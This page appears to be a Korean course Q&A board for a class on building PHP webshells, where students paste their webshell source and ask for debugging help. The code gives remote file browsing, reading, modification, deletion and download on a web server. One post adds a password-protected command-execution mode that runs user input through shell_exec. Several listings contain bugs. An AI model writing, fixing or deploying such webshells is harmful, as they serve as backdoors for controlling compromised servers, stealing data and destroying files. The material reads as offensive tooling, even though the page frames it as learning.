무료
다른 수강생들이 자주 물어보는 질문이 궁금하신가요?
- 미해결Skill-Up! 배워서 바로 쓰는 웹쉘 제작
파일내용 수정이 잘 안됩니다.
파일내용 수정이 안되고 내용이 없는 파일은 textarea 부분이 나타나지 않습니다.코드 작성본은 아래와 같습니다.해결할 수 있도록 도움 부탁드리겠습니다. <? header("Content-Type: text/html; charset=UTF-8"); $mode = $_REQUEST["mode"]; $path = $_REQUEST["path"]; $page = basename($_SERVER["PHP_SELF"]); $fileName = $_GET["fileName"]; if(empty($path)) { $tempFileName = basename(__FILE__); $tempPath = realpath(__FILE__); $path = str_replace($tempFileName, "", $tempPath); $path = str_replace("\\", "/", $path); } else { $path = realpath($path)."/"; $path = str_replace("\\", "/", $path); } # Mode Logic if ($mode == "fileCreate") { if(empty($fileName)) { echo "<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>"; exit(); } $fp = fopen($path.$fileName, "w"); fclose($fp); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } else if ($mode == "dirCreate") { if(empty($fileName)) { echo "<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>"; exit(); } $dirPath = $path.$fileName; if(is_dir($dirPath)) { echo "<script>alert('해당 디렉터리명이 존재합니다.');history.back(-1);</script>"; exit(); } mkdir($dirPath); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } else if ($mode == "fileModify" && !empty($_POST["fileContents"])) { $filePath = $path.$fileName; if(!file_exists($filePath)) { echo "<script>alert('파일이 존재하지 않습니다..');history.back(-1);</script>"; exit(); } $fileContents = $_POST["fileContents"]; $fp = fopen($filePath, "w"); fputs($fp, $fileContents, strlen($fileContents)); fclose($fp); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } # Directory List Return Function function getDirList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) == "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } # File List Return Function function getFileList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) != "1") { $listArr[] = $file; } } closedir($handler); return $listArr; }?><!DOCTYPE html><html lang="ko"></html><head> <title>godoks webshell test</title> <!-- 합쳐지고 최소화된 최신 CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"> <!-- 부가적인 테마 --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css"> <!-- 합쳐지고 최소화된 최신 자바스크립트 --> <script src="">https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script> <script> function fileCreate() { var fileName = frm.createFileName.value; if(!fileName) { alert("파일명을 입력하시오"); return; } location.href = "<?=$page?>?mode=fileCreate&path=<?=$path?>&fileName=" +fileName; } function dirCreate() { var fileName = frm.createFileName.value; if(!fileName) { alert("디렉터리명을 입력하시오"); return; } location.href = "<?=$page?>?mode=dirCreate&path=<?=$path?>&fileName=" +fileName; } function fileModify(fileName) { location.href = "<?=$page?>?mode=fileModify&path=<?=$path?>&fileName=" +fileName; } </script></head><body><div class="container-fluid"> <div class="row"> <div class="col-md-3"></div> <div class="col-md-6"> <h3>GODOKS_HACKing</small></h3> <hr> <ul class="nav nav-tabs"> <li role="presentation" <? if(empty($mode) || $mode == "fileBrowser") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation" <? if($mode == "fileUpload") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileUploadr">File Upload</a></li> <li role="presentation" <? if($mode == "command") echo "class=\"active\"";?>><a href="<?=$page?>?mode=command">Command Execution</a></li> <li role="presentation" <? if($mode == "DB") echo "class=\"active\"";?>><a href="<?=$page?>?mode=DB">DB Connector</a></li> <li role="presentation"><a href="<?=$page?>?mode=logout">Logout</a></li> </ul> <br> <form action="<?=$page?>"?mode=fileBrowsr" method="GET"> <? if(empty($mode) || $mode == "fileBrowser") { ?> <div class="input-group"> <span class="input-group-addon">Current Path</span> <input type="text" class="form-control" placeholder="Path Input..." name="path" value="<?=$path?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">Move</button> </span> </div> </form> <hr> <div class="table-responsive"> <table class="table table-bordered table-hover" style="table-layout: fixed; word-break: break-all;"> <thead> <tr calss="active"> <th style="width: 50%" class="text-center">Name</th> <th style="width: 14%" class="text-center">Type</th> <th style="width: 18%" class="text-center">Date</th> <th style="width: 18%" class="text-center">Action</th> </tr> </thead> <tbody> <? $dirList = getDirList($path); for($i=0; $i<count($dirList); $i++) { if($dirList[$i] !=".") { $dirDate = date("Y-m-d H:i", filemtime($path.$dirList[$i])); ?> <tr> <td style="vertical-align: middle" class="text-primary"><b><span class="glyphicon glyphicon-folder-open" aria-hidden="true"></span> <a href="<?=$page?>?mode=fileBrowser&path=<?=$path?><?=$dirList[$i]?>"><?=$dirList[$i]?></a></b></td> <td style="vertical-align: middle" class="text-center"><kbd>Directory</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$dirDate?></td> <td style="vertical-align: middle" class="text-center"> <? if($dirList[$i] !="..") {?> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <button type="button" class="btn btn-danger" title="Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> <? } ?> </td> </tr> <? } } ?> <? $fileList = getFileList($path); for($i=0; $i<count($fileList); $i++) { $fileDate = date("Y-m-d H:i", filemtime($path.$fileList[$i])); ?> <tr> <td style="vertical-align: middle"><span class="glyphicon glyphicon-file" aria-hidden="true"></span> <?=$fileList[$i]?></td> <td style="vertical-align: middle" class="text-center"><kbd>File</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$fileDate?></td> <td style="vertical-align: middle" class="text-center"> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <button type="button" class="btn btn-info" title="Download"><span class="glyphicon glyphicon-save" aria-hidden="true"></span></button> <button type="button" class="btn btn-warning" title="Modify" onclick="fileModify('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span></button> <button type="button" class="btn btn-danger" title="Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> </td> </tr> <? } ?> </tbody> </table> </div> <hr> <form name="frm"> <div class="input-group"> <input type="text" class="form-control" placeholder="File/Directory Name Input..." name="createFileName"> <span class="input-group-btn"> <button class="btn btn-default" type="button" onclick="fileCreate()">File Create</button> <button class="btn btn-default" type="button" onclick="dirCreate()">Directory Create</button> </span> </div> </form> <? } else if($mode == "fileModify") { ?> <? if(empty($fileName)) { echo "<script>alert('파일명이 존재하지 않습니다.');history.back(-1)</script>"; exit(); } $filePath = $path.$fileName; if(!file_exists($filePath)) { echo "<script>alert('파일이 존재하지 않습니다.');history.back(-1)</script>"; exit(); } $fp = fopen($filePath, "r"); $fileContents = fread($fp, filesize($filePath)); fclose($fp); ?> <form action="<?=$page?>?mode=fileModify&path=<?=$path?>&fileName=<?=$fileName?>" method="POST"> <div class="input-group"> <input type="text" class="form-control" value="<?=$path?><?=$fileName?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">File Modify</button> </span> </div> <hr> <textarea class="form-control" rows="20" name="fileContents"><?=htmlspecialchars($fileContents)?></textarea> </form> <br> <p class="text-center"><button class="btn btn-default" type="button" onclick="history.back(-1);">Back</button></p> <? } ?> <hr> <p class="text-muted text-center">Copyrightⓒ 2023, godoks, All rights reserved.</p> </div> <div class="col-md-3"></div> </div></div></body></html>
- 해결됨Skill-Up! 배워서 바로 쓰는 웹쉘 제작
안녕하세요 문제가 생겨서 질문드립니다.
$mode = $_REQUEST["mode"]; $page = basename($_SERVER["PHP_SELF"]);이 두줄을 치고 나서 새로고침을 하니까 에러가 뜨네요.왜그런지 알 수 있을까요? 코드 보여드리겠습니다.<ul class="nav nav-pills"> <li role="presentation" class="active"><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation"><a href="#">File Upload</a></li> <li role="presentation"><a href="#">Command Execution</a></li> <li role="presentation"><a href="#">DB Connecter</a></li> <li role="presentation"><a href="#">LogOut</a></li> </ul> PHP Parse error: syntax error, unexpected variable "$mode"
- 미해결Skill-Up! 배워서 바로 쓰는 웹쉘 제작
파일, 폴더 삭제, 파일다운로드, 파일 수정이 안됩니다.
#원래 수정은 됬었어요 <? header("Content-Type:text/html;charset=UTF-8"); $mode = $_REQUEST["mode"]; $path = $_REQUEST["path"]; $page = basename($_SERVER["PHP_SELF"]); $fileName = $_GET["fileName"]; if(empty($path)){ $tempFileName = basename(__FILE__); $tempPath = realpath(__FILE__); $path = str_replace($tempFileName, "", $tempPath); $path = str_replace("\\", "/", $path); } else { $path= realpath($path)."/"; $path = str_replace("\\", "/", $path); } #Mode Logic if($mode == "fileCreate") { if(empty($fileName)){ echo "<script>alert('Empty File Name.');history.back(-1);</script>"; exit(); } $fp = fopen($path.$fileName, "w"); fclose($fp); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } else if ($mode == "dirCreate") { if(empty($fileName)){ echo "<script>alert('Empty Directory Name.');history.back(-1);</script>"; exit(); } $dirPath = $path.$fileName; if(is_dir($dirPath)) { echo "<script>alert('Directory Already Exist.');history.back(-1);</script>"; exit(); } mkdir($dirPath); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; }else if ($mode == "fileModify" && !empty($_POST["fileContents"])) { $filePath = $path.$fileName; if(!file_exists(($filePath))) { echo "<script>alert('No File.');history.back(-1);</script>"; exit(); } $fileContents = $_POST["fileContents"]; $fp = fopen($filePath, "w"); fputs($fp, $fileContents, strlen($fileContents)); fclose($fp); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } else if ($mode == "fileDelete") { if(empty($fileName)){ echo "<script>alert('Empty file name');history.back(-1);</script>"; exit(); } $filePath = $path.$fileName; if(!file_exists(($filePath))) { echo "<script>alert('No File.');history.back(-1);</script>"; exit(); } if(!unlink($filePath)){ echo "<script>alert('Fail To Delete File');history.back(-1);</script>"; exit(); } echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; ####################################################################### } else if ($mode == "dirDelete") { if(empty($fileName)) { echo "<script>alert('No File.');history.back(-1);;</script>"; exit(); } $dirPath = $path.$fileName; if(!is_dir($dirPath)) { echo "<script>alert('No Directory.');history.back(-1);</script>"; } if(!rmdir($dirPath)) { echo "<script>alert('Fail To Delete Directory');history.back(-1);</script>"; exit(); } echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>"; } else if ($mode == "fileDownload") { if(empty($fileName)) { echo "<script>alert('No File.');history.back(-1);;</script>"; exit(); } $filePath = $path.$fileName; if(!file_exists(($filePath))) { echo "<script>alert('No File.');history.back(-1);</script>"; exit(); } header("Content-Type:application/octet-stream"); header("Content-Disposition:attachment; fileName=\"{$fileName}\""); header("Content-Transfer-Encoding:binary"); readfile($filePath); exit(); } #Dir list return function function getDirList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir()) { if(is_dir($getPath.$file) == "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } #File List Return Function function getFileList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir()) { if(is_dir($getPath.$file) != "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } ?> <!DOCTYPE html> <html lang="ko"> <head> <title>SP WEBSHELL1.0.1</title> <!-- 합쳐지고 최소화된 최신 CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"> <!-- 부가적인 테마 --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css"> <!-- 합쳐지고 최소화된 최신 자바스크립트 --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script> <script> function fileCreate() { var fileName = frm.createFileName.value; if(!fileName){ alert("Please Input File Name."); return; } location.href = "<?=$page?>?mode=fileCreate&path=<?=$path?>&fileName=" + fileName; } function dirCreate() { var fileName = frm.createFileName.value; if(!fileName){ alert("Please Input Directory Name."); return; } location.href = "<?=$page?>?mode=dirCreate&path=<?=$path?>&fileName=" + fileName; } function fileModify(fileName) { location.href = "<?=$page?>?mode=fileModify&path=<?=$path?>&fileName=" + fileName; function dirDelete(fileName) { if(confirm("Will you delete this directory? :" + fileName) == true){ location.href = "<?=$page?>?mode=dirDelete&path=<?=$path?>&fileName=" + fileName; } } function fileDelete(fileName) { if(confirm("Will you delete this file? :" + fileName) == true){ location.href = "<?=$page?>?mode=fileDelete&path=<?=$path?>&fileName=" + fileName; } } } function fileDownload(fileName) { location.href = "<?=$page?>?mode=fileDownload&path=<?=$path?>&fileName=" + fileName; </script> </head> <body> <div class="container-fluid"> <div class="row"> <div class="col-md-3"></div> <div class="col-md-6"> <h3>SP WEBSHELL ver 1.0.3</h3> <hr> <ul class="nav nav-tabs"> <li role="presentation" <? if(empty($mode) || $mode == "fileBrowser") echo "class=\active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation"><a href="<?=$page?>?mode=fileUpload">File Upload</a></li> <li role="presentation" <? if($mode == "fileUpload") echo "class=\active\"";?>><a href="<?=$page?>?mode=command">Command Excution</a></li> <li role="presentation" <? if($mode == "logout") echo "class=\active\"";?>><a href="<?=$page?>?mode=logout">Logout</a></li> </ul> <br> <? if(empty($mode) || $mode == "fileBrowser") { ?> <form action="<?=$page?>?mode=fileBrowser" method="GET"> <div class="input-group"> <span class="input-group-addon">Current Path</span> <input type="text" class="form-control" placeholder="Path_Input" name="path" value="<?=$path?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">Move</button> </span> </div> </form> <hr> <div class="table-responsive"> <table class="table table-bordered table-hover"style="table-layout: fixed; word-break: break-all;"> <thead> <tr class="active"> <th style="width: 50%"class="text-center">Name</th> <th style="width: 14%" class="text-center">Type</th> <th style="width: 18%" class="text-center">Date</th> <th style="width: 18%" class="text-center">Action</th> </tr> </thead> <tbody> <? $dirList = getDirList($path); for($i=0; $i<count($dirList); $i++) { if($dirList[$i] !=".") { $dirDate= date("Y-m-d H:i", filemtime($path.$dirList[$i])); ?> <tr> <td style="vertical-align: middle"><span class="glyphicon glyphicon-folder-open" aria-hidden="true"></span><b> <a href="<?=$page?>?mode=fileBrowser&path=<?=$path?><?=$dirList[$i]?>"><?=$dirList[$i]?></a></b></td> <td style="vertical-align: middle" class="text-center"><kbd>Directory</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$dirDate?></td> <td style="vertical-align: middle" class="text-center"> <? if($dirList[$i] !="..") {?> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <button type="button" class="btn btn-danger" title="Directory Delete" onclick="dirDelete('<?=$dirList[$i]?>')"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> <? }?> </div> </td> </tr> <? } } ?> <? $fileList = getFileList($path); for($i=0; $i<count($fileList); $i++) { $fileDate= date("Y-m-d H:i", filemtime($path.$fileList[$i])); ?> <tr> <td style="vertical-align: middle"><span class="glyphicon glyphicon-file" aria-hidden="true"></span> <?=$fileList[$i]?></td> <td style="vertical-align: middle" class="text-center"><kbd>File</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$fileDate?></td> <td style="vertical-align: middle" class="text-center"> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <button type="button" class="btn btn-info" title="File Download" onclick="fileDownload('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-save" aria-hidden="true"></span></button> <button type="button" class="btn btn-warning" title="File Modify" onclick="fileModify('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span></button> <button type="button" class="btn btn-danger" title="File Delete" onclick="fileDelete('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> </td> </tr> <? } ?> </tbody> </table> </div> <hr> <form name="frm"> <div class="input-group"> <input type="text" class="form-control" placeholder="File/Directroy Name Input..." name="createFileName"> <span class="input-group-btn"> <button class="btn btn-default" type="button" onclick="fileCreate()">File Create</button> <button class="btn btn-default" type="button" onclick="dirCreate()">Directory Create</button> </span> </div> </form> <? } else if($mode == "fileModify") { ?> <? if(empty($fileName)) { echo"<script>alert('No File.');history.back(-1);</script"; exit(); } $filePath = $path.$fileName; if(!file_exists($filePath)){ echo"<script>alert('No File.');history.back(-1);</script"; exit(); } $fp = fopen($filePath, "r"); $fileContents = fread($fp, filesize($filePath)); fclose($fp); ?> <form action="<?=$page?>?mode=fileModify&path=<?$path?>&fileName=<?=$fileName?>" method="POST"> <div class="input-group"> <input type="text" class="form-control" value="<?=$path?><?=$fileName?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">File Modify</button> </span> </div> <textarea class="form-control" rows="20" name="fileContents"><?=htmlspecialchars($fileContents)?></textarea> </form> <br> <p class="text-center"><button class="btn btn-default" type="button" onclick="history.back(-1)">Back</button></p> <? } ?> <hr> <p class="text-muted text-center">Made by SPACEPIG#1747</p> <div class="col-md-3"></div> </div> </div> </body> </html>
- 미해결Skill-Up! 배워서 바로 쓰는 웹쉘 제작
fileModify버튼 클릭시 문의
안녕하세요 강사님 <? } else if($mode == "fileModify") { ?> <textarea class="form-control" rows="3"></textarea> <? } ?> 부분을 추가하여 파일 수정 버튼을 클릭시 textarea 부분이 안생겨 문의 드립니다. 저 부분을 적용 후 해당 버튼 클릭하여 들어가면 위의 else if문이 안먹는건지 저부분을 불러오질 못합니다.(f12로 페이지 소스 확인시 저 위의 부분이 안보임 제 소스코드는 아래와 같습니다. <? header('Content-Type:text/html; charset=utf-8'); $mode = $_REQUEST["mode"]; $path = $_REQUEST["path"]; $page = basename($_SERVER["PHP_SELF"]); $fileName = $_GET["fileName"]; if(empty($path)) { $tempFileName = basename(__FILE__); $tempPath = realpath(__FILE__); $path = str_replace($tempFileName, "", $tempPath ); $path = str_replace("\\", "/", $path); } else { $path = realpath($path)."/"; $path = str_replace("\\", "/", $path); } # Mode Logic if ($mode == "fileCreate"){ if(empty($fileName)){ echo "<script>alert('파일명이 입력되지 않았습니다.');history.back(-1);</script>"; exit(); } $fp = fopen($path.$fileName, "w"); fclose($fp); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}' </script>"; } else if ($mode == "dirCreate"){ if(empty($fileName)){ echo "<script>alert('디렉터리명이 입력되지 않았습니다.');history.back(-1);</script>"; exit(); } $dirPath = $path.$fileName; if(is_dir($dirPath)){ echo "<script>alert('해당 디렉터리명이 존재합니다.');history.back(-1);</script>"; exit(); } mkdir($dirPath); echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}' </script>"; } # Directory List Return Function function getDirList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) == "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } # File List Return Function function getFileList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) != "1") { $listArr[] = $file; } } closedir($handler); return $listArr; }?> <!DOCTYPE html><html lang="ko"><head> <title>Crehacktive webshell</title><!-- 합쳐지고 최소화된 최신 CSS --><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"> <!-- 부가적인 테마 --><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css"> <!-- 합쳐지고 최소화된 최신 자바스크립트 --><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script> <script> function fileCreate(){ var fileName = frm.createFileName.value; if(!fileName){ alert("파일명을 입력하세요."); return; } location.href="<?=$page?>?mode=fileCreate&path=<?=$path?>&fileName=" + fileName; } function dirCreate(){ var fileName = frm.createFileName.value; if(!fileName){ alert("디렉터리명을 입력하세요."); return; } location.href="<?=$page?>?mode=dirCreate&path=<?=$path?>&fileName=" + fileName; } function fileModify(fileName){ location.href = "<?=$page?>?mode=fileModify@path=<?=$path?>&fileName=" + fileName; }</script></head><body><div class="container-fluid"> <div class="row"> <div class="col-md-3"></div> <div class="col-md-6"> <h3>WebShell_Test <small>Create by Penta</small></h3> <hr> <ul class="nav nav-tabs"> <li role="presentation" <? if(empty($mode) || $mode == "fileBrowser") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation" <? if($mode == "fileUpload") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileUpload">File Upload</a></li> <li role="presentation" <? if($mode == "command") echo "class=\"active\"";?>><a href="<?=$page?>?mode=command">Command Execution</a></li> <li role="presentation" <? if($mode == "db") echo "class=\"active\"";?>><a href="<?=$page?>?mode=db">DB Connector</a></li> <li role="presentation"><a href="<?=$page?>?mode=logout">Logout</a></li> </ul> <br> <? if(empty($mode) || $mode == "fileBrowser") { ?> <form action="<?=$page?>?mode=fileBrowser" method="GET" > <div class="input-group"> <span class="input-group-addon">Current Path</span> <input type="text" class="form-control" placeholder="Path Input..." name="path" value="<?=$path?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">Move</button> </span> </div> </form> <hr> <div class="table-responsive"> <table class="table table-bordered table-hover" style="table-layout: fixed; word-break: break-all;"> <thead> <tr class="info"> <th style="width: 50%" class="text-center">Name</th> <th style="width: 14%" class="text-center">Type</th> <th style="width: 18%" class="text-center">Date</th> <th style="width: 18%" class="text-center">Action</th> </tr> </thead> <tbody> <? $dirList = getDirList($path); for($i=0; $i<count($dirList); $i++) { if($dirList[$i] != ".") { $dirDate = date("Y-m-d H:i", filemtime($path.$dirList[$i])); ?> <tr> <td style="vertical-align: middle" class="text-primary"><b><span class="glyphicon glyphicon-folder-open" aria-hidden="true"></span> <a href="<?=$page?>?mode=fileBrowser&path=<?=$path?><?=$dirList[$i]?>"><?=$dirList[$i]?></a></b></td> <td style="vertical-align: middle" class="text-center"><kbd>Directory</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$dirDate?></td> <td style="vertical-align: middle" class="text-center"> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <? if($dirList[$i] != "..") { ?> <button type="button" class="btn btn-warning" title="File Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> <? } ?> </td> </tr> <? } } ?> <? $fileList = getFileList($path); for($i=0; $i<count($fileList); $i++) { $fileDate = date("Y-m-d H:i", filemtime($path.$fileList[$i])); ?> <tr> <td style="vertical-align: middle"><span class="glyphicon glyphicon-file" aria-hidden="true"></span> <?=$fileList[$i]?></td> <td style="vertical-align: middle" class="text-center"><kbd>File</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$fileDate?></td> <td style="vertical-align: middle" class="text-center"> <div class="btn-group btn-group-sm" role="group" aria-label="..."> <button type="button" class="btn btn-success" title="File Download"><span class="glyphicon glyphicon-download-alt" aria-hidden="true"></span></button> <button type="button" class="btn btn-info"title="File Modify" onclick="fileModify('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-refresh" aria-hidden="true"></span></button> <button type="button" class="btn btn-warning" title="File Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> </td> </tr> <? } ?> </tbody> </table> </div> <hr> <form name="frm"> <div class="input-group"> <input type="text" class="form-control" placeholder="File/Directory Name Input..." name="createFileName""> <span class="input-group-btn"> <button class="btn btn-default" type="button" onclick="fileCreate()">File Create</button> <button class="btn btn-default" type="button" onclick="dirCreate()">Directory Create</button> </span> </div> </form> <? } else if($mode == "fileModify") { ?> <textarea class="form-control" rows="3"></textarea> <? } ?> <hr> <p class="text-mute text-center">CopyRight 2022, Penta, All Rights reserved. </p> </div> <div class="col-md-3"></div> </div></div></body></html>
- 해결됨Skill-Up! 배워서 바로 쓰는 웹쉘 제작
죄송합니다;; 또 에러가 나네요(해결해주세요.)
이번엔 그 7월 전꺼 리마스터 처럼 필요한 부분(파일 브라우저, 커맨드, 인증 기능)만 만들려고 해봤는데 갑자기 에러가 나네요. error.log도 봤는데 해결 못하겠어서요. 소스입니다;; <? session_start(); header("Content-Type: text/html; charset=UTF-8"); $mode = $_REQUEST["mode"]; $path = $_REQUEST["path"]; $page = basename($_SERVER["PHP_SELF"]); $inputPW = $_POST["inputPw"]; $accessPw = "jorkdhnghks6352"; ##!access password!## $accessFlag = $_SESSTION["accessFlag"]; if($accessFlag == "Y"); { if(empty($path)){ $tempFileName = basename(__FILE__); $tempPath = realpath(__FILE__); $path = str_replace($tempFileName, "", $tempPath); $path = str_replace("\\", "/", $path); } else { $path = realpath($path)."/"; $path = str_replace("\\", "/", $path); } # Dir list retuurn function function getDirList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) == "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } } #File List return function function getFileList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) != "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } if ($mode == "login" && ($accessPW == $inputPW)) { $_SESSION["accessFlag"] = "Y"; echo "<script>location.href= '{$page}'</script>"; exit(); } ?> <!DOCTYPE html> <html lang="ko"> <head> <title>SPACEPIG's Webshell</title> <!-- 합쳐지고 최소화된 최신 CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"> <!-- 부가적인 테마 --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css"> <!-- 합쳐지고 최소화된 최신 자바스크립트 --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script> </head> <body> <div class="container-fluid"> <div class="row"> <div class="col-md-3"></div> <div class="col-md-6"> <? if ($accessFlag != "Y") { ?> <h3>Login</h3> <hr> <form action="<?=$page?>?mode=login" method="POST"> <div cLass="input-group"> <span clLass="input-group-addon">Password</span> <input type="password" class="form-control" pLacehoLder="Password Input..." name="inputPw"> </div> <br> <p cLass="text-center"><button class="btn btn-default" type="submit">Auth</button></a> </form> <? } else { ?> <h3>Webshell ver.0.0.1.Beta <small>Created by Spacepig</small></h3> <hr> <ul class="nav nav-tabs"> <li role="presentation" <?if(empty($mode) || $mode == "fileBrowser") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation" <?if($mode == "command") echo "class=\"active\"";?>><a href="<?=$page?>?mode=command">Command Execution</a></li> <li role="presentation" <?if($mode == "logout") echo "class=\"active\"";?>><a href="<?=$page?>?mode=logout">Logout</a></li> </ul> <br> <?if(empty($mode) || $mode == "fileBrowser") { ?> <form action="<?=$page?>?mode=fileBrowser" metho="GET"> <div class="input-group"> <span class="input-group-addon">Current Path</span> <input type="text" class="form-control" placeholder="Path Input..." name="path" value="<?=$path?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">Move</button> </span> </div> </form> <hr> <div class="table-responsive"> <table class="table table-bordered table-hover" style="table-layout: fixed; word-break: break-all;"> <thead> <tr class="active"> <th style="width: 50%"class="text-center">Name</th> <th style="width: 20%" class="text-center">Type</th> <th style="width: 30%" class="text-center">Date</th> </tr> </thead> <tbody> <? $dirList = getDirList($path); for($i=0; $i<count($dirList); $i++) { if($dirList[$i] != ".") { $dirDate = date("Y-m-d H:i", filemtime($path.$dirList[$i])); ?> <tr> <td style="vertical-align : middle" class="text-primary"><b><span class="glyphicon glyphicon-folder-open" aria-hidden="true"></span> <a href="<?=$page?>?mode=fileBrowser&path=<?=$path?><?=$dirList[$i]?>"><?=$dirList[$i]?></a></td> <td style="vertical-align : middle" class="text-center"><kbd>Directory</kbd></td> <td style="vertical-align : middle" class="text-center"><?=$dirDate?></td> <td style="vertical-align : middle" class="text-center"> <? if($dirList[$i] != "..") { ?> <div class="btn-group btn-group-sm" role="group" aria-label="..."> </div> <? } ?> </td> </tr> <? } ?> <? } ?> <? $fileList = getFileList($path); for($i=0; $i<count($fileList); $i++) { $fileDate = date("Y-m-d H:i", filemtime($path.$fileList[$i])); ?> <tr> <td style="vertical-align : middle"><span class="glyphicon glyphicon-file" aria-hidden="true"></span> <?=$fileList[$i]?></td> <td style="vertical-align : middle" class="text-center"><kbd>File</kbd></td> <td style="vertical-align : middle" class="text-center"><?=$fileDate?></td> <td style="vertical-align : middle" class="text-center"> <div class="btn-group btn-group-sm" role="group" aria-label="..."> </div> </td> </tr> <? } ?> </tbody> </table> </div> <? } else if(empty($mode) || $mode == "command") { ?> <form action="<?=$page?>?mode=command" method="POST"> <div class="input-group"> <span cLass="input-group-addon">Command</span> <input type="text" cLass="-form-control" pLacehoLder="Command Input..." name="command" value="<?=$command?>"> <span cLass="input-group-btn"> </span> </div> <br> <div class="btn-group btn-center" role="group" aria-label="..."> <p class="text-center"><button cLass="btn btn-default" type="submit">Execution</button></a> </div> </form> <? if(!empty($_POST["command"])) { echo "<hr>"; $result = shell_exec($_POST["command"]); $result = str_replace("\n", "<br>", $result); $result = iconv("CP949", "UTF-8", $result); echo "𝙍𝙀𝙎𝙐𝙇𝙏", "<br>", $result; } ?> <? } ?> <? } ?> <hr> <p class="text-muted text-center">Copyright© 2022, Spacepig, All rights reserved.</p> </div> <div class="col-md-3"></div> </div> </div> </body> </html>
- 미해결Skill-Up! 배워서 바로 쓰는 웹쉘 제작
질문
혹시 DB커넥터랑 커맨드 기능만 만들어도 사용가능한가요?
- 해결됨Skill-Up! 배워서 바로 쓰는 웹쉘 제작
질문 있어요! 제발 해결해주세요
